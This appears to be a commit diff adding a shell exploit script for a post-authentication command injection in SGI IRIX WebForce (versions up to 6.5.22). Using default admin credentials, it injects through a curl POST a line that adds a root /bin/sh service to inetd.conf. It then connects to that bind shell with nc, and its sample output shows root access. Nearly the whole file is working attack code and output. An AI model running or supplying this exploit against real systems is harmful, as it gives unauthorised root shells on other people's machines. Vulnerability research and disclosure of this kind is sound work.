|
| 1 | +#!/bin/sh |
| 2 | +#SGI IRIX <= 6.5.22 WebForce post-auth Remote Command Injection |
| 3 | +#============================================================== |
| 4 | +#SGI IRIX supports a Webmin and CGI based Administration utility |
| 5 | +#known as WebForce which runs by default on tcp port 2077 & 8184. |
| 6 | +#The applications use client-side input validation and restrict |
| 7 | +#some activities, like running arbitrary commands and viewing |
| 8 | +#arbitrary files. The perl scripts in use for adding and deleting |
| 9 | +#a static route are vulnerable to command injection through |
| 10 | +#system() function. These issues require the "admin" credentials |
| 11 | +#for the WebForce service to exploit this issue. This exploit |
| 12 | +#uses curl to send the exploit with default credentials and will |
| 13 | +#bind a shell on port 532 via inetd.conf. Dont forget to clean up |
| 14 | +#inetd.conf and /etc/config/static-routes.option after running. |
| 15 | +# |
| 16 | +# $ ./hfirixpwn 192.168.11.120 |
| 17 | +# [+] SGI IRIX <= 6.5.22 WebForce post-auth remote command injection exploit |
| 18 | +# [-] sending exploit magic to 192.168.11.120 ... |
| 19 | +# [-] done ... |
| 20 | +# [-] connecting to your shell ... |
| 21 | +# 192.168.11.120 532 (netnews) open |
| 22 | +# # id;uname -a |
| 23 | +# uid=0(root) gid=0(sys) |
| 24 | +# IRIX indiegogo 6.5 10070055 IP22 |
| 25 | +# # |
| 26 | +# |
| 27 | +# -- Hacker Fantastic |
| 28 | +# https://hacker.house |
| 29 | +# |
| 30 | +echo [+] SGI IRIX \<= 6.5.22 WebForce post-auth remote command injection exploit |
| 31 | +if [ "$1" ]; then |
| 32 | + echo [\-] sending exploit magic to $1 ... |
| 33 | + curl -s http://$1:2077/admin/static.cgi -u admin:admin -X POST -d "destination=;echo netnews stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;/etc/killall -HUP inetd;&route=127.0.0.1&type=net&doAdd=Ok" 2>&1 > /dev/null |
| 34 | + echo [\-] done ... |
| 35 | + echo [\-] connecting to your shell ... |
| 36 | + sleep 1 |
| 37 | + nc -v $1 532 |
| 38 | +else |
| 39 | + echo [\!] usage. requires target IP. |
| 40 | +fi |
0 commit comments